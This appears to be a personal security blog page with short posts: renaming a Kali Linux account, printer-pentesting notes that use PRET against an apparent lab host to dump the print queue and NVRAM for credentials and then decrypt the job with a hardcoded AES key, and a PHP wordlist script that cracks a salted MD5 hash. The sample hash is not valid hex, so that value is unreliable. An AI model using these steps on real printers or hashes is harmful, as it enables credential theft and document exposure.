Posts

Showing posts from August, 2020

Changing your Account Name in Kali Linux

CTRL + ALT + F1                                   # Go to TTY1
sudo adduser TempUser                             # Create a new user account
sudo adduser TempUser sudo                        # Give it sudo privileges
exit                                              # Log out, then log in as TempUser
sudo usermod -l newUsername kali                  # Most likely this fails; a running process needs to be killed
kill PID                                          # Kill the running process of the kali account
sudo usermod -d /home/newHomeDir -m newUsername
sudo deluser TempUser
sudo rm -r /home/TempUser
CTRL + ALT + F7                                   # Log in with the new account

Pentesting Printers

HP Jet Direct Exploit - Port 9100

git clone https://github.com/RUB-NDS/PRET.git
./pret.py 10.10.10.201 pjl

Go to the queued file and download it:

get queued
nvram dump                                        # RAM dump for creds

sed -e "s#'##g" queued | cut -c2- > queued.b64
cat queued.b64 | base64 -d > somefile.raw

decrypt_printer_queue.py:

import io, sys, base64
from Crypto.Cipher import AES

# Layout used by this script: 8 bytes skipped, 16-byte IV, then the ciphertext
with io.open('somefile.raw', 'rb') as fp:
    c = fp.read()[8:]
    iv, ct = c[:16], c[16:]

# The key must be a bytes object under Python 3
cipher = AES.new(b'13vu94r6643rv19u', AES.MODE_CBC, iv)
z = cipher.decrypt(ct)
sys.stdout.buffer.write(z)

python3 decrypt_printer_queue.py > newfile
file newfile
newfile: PDF document, version 1.4
mv newfile newfile.pdf

Script to Crack MD5 crypt with a salt

<?php
// Target hash: md5() of crypt(password, 'fa')
$hash = 'e626d51g54t54765a88396c35d05';
$wordlist = fopen("/usr/share/wordlists/rockyou.txt", "r");
$count = 0;
$start_time = microtime(true);

while (!feof($wordlist)) {
    // Read one candidate per line and strip the trailing newline
    $str = fgets($wordlist);
    $str = trim($str);
    $genhash = md5(crypt($str, 'fa'));

    // Strict comparison avoids PHP type juggling on hash-like strings
    if ($hash === $genhash) {
        echo "Password Found: " . $str . "\n";
        $end_time = microtime(true);
        $execution_time = ($end_time - $start_time);
        echo "Tried Passwords:=" . $count . "\n";
        echo "Time taken in cracking = " . $execution_time . " sec";
        fclose($wordlist);
        exit(0);
    } else {
        $count = $count + 1;
    }
}

fclose($wordlist);
?>